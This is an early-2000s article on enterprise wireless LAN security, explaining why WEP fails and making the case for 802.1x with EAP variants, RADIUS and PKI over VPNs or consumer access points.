|Home > Articles > Wireless LAN Security||Bookmark page|
Introduction………………......... The case for REAL Wireless LAN Security
The problem with WEP……....... Why Wired Equivalent Privacy is not so private
Interim solution with VPN……..Why VPN is not the best solution
Introducing 802.1x and EAP……The new gold standard in Wireless LAN Security
Various flavors of EAP…………The emergence of four EAP standards
Hardware requirements…………Compatible Client Adaptor and Access Points
Conclusion……………………… Security is worth every penny
As the promise of Wireless LANs become ever more enticing, the perils of your LAN security being split wide open becomes ever more daunting. The problem, Joe User (your typical technically savvy employee) can just walk down to the local computer store, buy a $100 Wireless Access Point and have Wireless LAN freedom in 15 minutes. Unfortunately, he just opened up your private internal network to the entire world because any one within range can now instantly bypass your firewall. Additionally, finding one of these rogue access points is no simple matter and when you finally manage to shut it down, another two pop up somewhere else. WEP (Wired Equivalent Privacy), the encryption protocol used by all WiFi 802.11b devices to secure the wireless network is at best implemented half the time. Even when WEP is implemented, the well publicized weaknesses of WEP add only minimal protection against the casual hacker. The only solution to this problem is to implement an official Wireless LAN with real Wireless LAN security while banning users from implementing their own Wireless Networks. Providing a convenient and secure alternative is the only way to enforce this ban on personal wireless networking. In this paper, we will examine the problems with WEP, the solution with 802.1x and EAP, and the concepts and implementation of an Enterprise worthy wireless LAN.
The problem with WEP:
During the inception of the 802.11 standards for wireless networking, a fundamental issue of wireless security needed to be resolved. Because the physical layer of wireless networking uses Radio Signals through the open air waves and not electrical signals through closed wires, there was no physical security of the wireless signal compared to that afforded by wired networking. WEP was created to address this fundamental liability. It was suppose to give wireless networks the equivalent privacy of wired networks by using 40 and 104 bit encryption. Unfortunately for what ever reason, their effort resulted in a Wired Equivalent Privacy that was not so private. Soon after the release of the 802.11b specification with WEP, security researchers discovered massive weaknesses in WEP due to it’s poor implementation of the RC4 encryption scheme. Well publicized papers like "Weaknesses in the Key Scheduling Algorithm of RC4" by Fluhrer, Mantin, and Shamir have spawned freeware applications like AirSnort and WEPCrack to first passively capture a data sample (100 to 1000 MBs) and crack WEP using non-brute force techniques in as little as a few hours. This means that anyone with a laptop and a 60 dollar 802.11b adapter can get behind your firewall with minimal time and effort even when maximum encryption is enforced.
Making the situation worse, the limited range of 802.11 products is no sanctuary against hackers because you can be attacked from well beyond your own parking lot. Ten dollars of parts from Radio Shack and a Pringles potato chip can will boost an 802.11 card’s 100 foot range to about 10 miles line of sight, not to mention what an industrial grade directional antenna can do to you.
Then to put the nail in the coffin, because the 802.11 standard has no facility to centrally manage or distribute keys, WEP is fatally crippled by the fact that WEP keys are the same for all users, all sessions and never changes. Attempting to manually change the WEP key is highly impractical due to the fact it requires you to manually communicate to every wireless user what the new WEP key is so that they can manually enter it in to their WEP settings. The final result is a WEP standard that is worthless for anything other than casual home web surfing.
Interim solution with VPN:
As a temporary measure to secure wireless networking, the IT industry began turning to IPSEC based VPNs with 3DES encryption. Sometimes, companies could even leverage their existing Internet based VPN infrastructure if they had the excess capacity but otherwise, cost considerations could become a major prohibitive factor. But even ignoring the cost issue, VPN is not the cure all solution due to several key issues.
The first problem is ease of use; wireless users must take the additional step of acquiring a VPN connection after they manage to acquire a wireless solution. Then any interruption in service (as is common with wireless networking) will drop the VPN connection forcing the user to reconnect to the VPN server often.
The second problem is QOS; because all of the wireless traffic is tunneled, it prevents quality of service from prioritizing traffic. Without QOS, certain applications that require priority handling may fail.
The third problem is security; although all wireless traffic is encrypted via VPN, the wireless LAN interface on the client machine is wide open. This is just like connecting to the public Internet without a firewall allowing hackers a free crack at your WLAN interface over the air or over the web. To address this issue, software based personal firewalls must be installed on the WLAN interface.
Several VPN vendors have sprung up to meet this challenge and address some of these issues by doing things like “Auto-Reconnect”, unfortunately none of them address the real issue of achieving true “Wired Equivalent Privacy”. This is not to say that VPN does not have a place in Wireless Networking because it does. Wireless ISPs or Wireless Hotspots such as Starbucks are the perfect place to use VPNs and is in fact the only appropriate solution in that scenario. This shares the same VPN infrastructure as Wired ISPs or Wired Hotspots and is identical in purpose and functionality. Being Wired or Wireless on the Internet makes no difference because you are on a hostile network to begin with. How ever, VPNs should not be used for Wireless LANs. This is where a true “Wired Equivalent Privacy” solution would make perfect sense allowing for a secure and direct VPN-free connection to your internal LAN.
Introducing 802.1x and EAP:
Soon after the IEEE recognized the shortcomings of WEP and 802.11, they quickly came up with the 802.1x and EAP solution. 802.1x is a standard for “Port Based Access Control” for both wired and wireless networking and in it self does not make wireless networking secure. But, in conjunction with the EAP (Extensible Authentication Protocol) standard, the gold standard in Wireless Network Security is born. 802.1x acts as the gate keeper while EAP acts as the authentication mechanism and the combination of the two makes it possible to resolve the biggest liability of WEP, Static User and Static Session Keys. User authentication is now mutually assured, WEP keys can now be centrally managed with policies and keys can be distributed securely. With this new key management and distribution infrastructure, WEP keys can now be unique for individual users and individual sessions. In addition, the key can be set to automatically expire every 10 minutes to force constant re-keying making it impossible to collect the 100-1000 Megabytes of data required to break WEP. “Wired Equivalent Privacy” can finally be a reality.
In the illustration below, the client first connects to the Access Point in an unauthorized state (this is the 802.1x portion) and is in restricted mode. Using EAP (Extensible Authentication Protocol), mutual authentication is performed. The exact type of EAP authentication is an open standard and based on vendor implementation and will be covered in detail later in this paper. Once mutual authentication is completed using EAP, the Access Point will switch to an authorized 802.1x mode allowing the Supplicant on to the internal network. Then each 10 minutes later (Administrator definable expiration), the session will time out forcing the EAP process to run again to buy another 10 minutes of wireless access. Note that the entire 802.1x and EAP process is fully transparent to the user and only takes a few milliseconds to complete.
Various flavors of EAP:
Because the 802.1x and EAP are open standards, implementation is left to the individual vendors. As a result, four type of EAP have emerged as standards. But they all share the same underlying 802.1x and EAP architecture found in Figure 1. The only difference is in the way they implement mutual authentication for the EAP.
Almost all 802.11 Wireless Adapters support 802.1x and EAP-TLS natively with Windows XP. With older operating systems, 802.1x driver support depends on the vendor of the wireless adapter. For true Cisco LEAP support, you will need to purchase a Cisco PC Card. Only Cisco 802.11 adaptors support LEAP natively. Most client adapters are also compatible with Funk’s EAP-TTLS. Some of the Intersil Prism Wireless chipsets can emulate all four EAP standards with the aid of the MDC (Meetinghouse Data Communications) Aegis client although it does not achieve 100% compatibility. Most of the Orinoco adaptors cost $60 to $100 while the Cisco adapters cost $110 to $140. Integrated adapters from a Laptop vendor with full EAP-TLS support and LEAP emulation can cost as little as $50.
For Client Access Software, Windows XP provides OS native support for EAP-TLS. Support for older Windows operating systems like 2000, 98, NT, and Pocket PC will be added by Microsoft by the end of 2002. For LEAP support, Cisco's provides the only native client for LEAP support and it’s OS support is extensive. Cisco's Client is bundled with their Aironet Wireless Adaptors. Funk has their own Odyssey Client for native EAP-TTLS support and OS support is also excellent. Third Party solutions like that provided by MDC (Meetinghouse Data Communications) can offer EAP support for any of the four EAP types and some Integrated Wireless Solutions bundle the MDC solution. For the most part, 802.1x and EAP is exclusive to the Microsoft Windows platform. How ever, there are rare echoes of a Unix Supplicant.
For Access Points, only the industrial grade solutions will support 802.1x and EAP such as those from Agere (Lucent Spin Off), Cisco, Intel, Avaya, Buffalo Technology, 3Com, Enterasys, Intermec, Nokia, and Symbol. But you definitely need to check with the vendors on which of their product line supports 802.1x and your desired flavor of EAP. These high-end Access Points cost $400 to $1000 depending on the features included. Certainly this is a lot more expensive than the SOHO solutions that cost $100 to $200 but you get vastly superior features like Dynamic WEP, better antennas, upgradeable hardware and software, and better reliability than the cheap SOHO solutions.
For RADIUS support, you can use FreeRADIUS on Linux, Cisco's ACS/AR RADIUS, Funk Software's Odyssey or Steel Belted RADIUS, Interlink Networks, Open Systems Consultants, and Microsoft IAS (Bundled with Windows 2000). Pricing for the Linux and Microsoft Solutions are virtually free since Linux is open source and you can run IAS on your existing Domain Controllers. However, IAS is substantially easier to install and administrate and it has proven to be reliable. The other solutions range between $2000 and $6000 dollars. All of these RADIUS solutions support EAP-TLS. LEAP is supported by all but Microsoft and EAP-TTLS is only supported by Funk's solution.
PKI (Public Key Infrastructure) is required for the EAP-TLS solution. Microsoft Windows 2000 Server has the CA (Certificate Authority) Service bundled with the OS so pricing is extremely attractive. Much of the PKI can be put onto your existing Windows 2000 servers. You can also purchase certificates from public CAs like Verisign, but that is not recommended for practicality and pricing issues.
While Cisco and funk have proprietary versions of EAP, Agere uses their own proprietary encryption scheme AS2000 that completely bypasses WEP and EAP while using 802.1x. How ever, all three vendors like nearly every other vendor support EAP-TLS.
Making the choice:
As you can see, you have quite a few options to choose from. It can be at tough decision to make considering that LEAP and EAP-TTLS has full OS support now but are locked to a single vendor while EAP-TLS is just the opposite with full vendor support but currently locked to a single OS. Possibly confusing the issue more, PEAP is on the horizon. The decision is made simpler if you already have some of the required infrastructure in place that can be leveraged for implementing a specific flavor of EAP or if you have strong preferences for a certain vendor. The ultimate direction of wireless LAN security will likely be EAP-TLS for maximum enterprise level security and PEAP’s pretty good security for small businesses that lack the skill set to implement a public key infrastructure. Cisco’s LEAP will continue to have a large legacy installed base for the next few years. But regardless of the lack of a single standard, make no mistake that WEP can and should be secured now with any of these three existing solutions. Fortunately, most of the hardware firmware and client software you buy now will be upgradeable in the future.
Security is worth every penny
For any business network where Wireless Encryption needs to hold beyond one day, the time for real wireless LAN security is now. 802.1x and EAP have finally brought us true “Wired Equivalent Privacy” by giving us dynamic WEP keys. The days that we can tolerate the cheap $100 SOHO solutions are long gone and even though this may seem like a steep investment, your company’s security should worth every penny. Overall security is about the weakest link. Your $100,000 firewall is useless if someone can run a simple bypass on a Rogue Access Point with or with out standard WEP.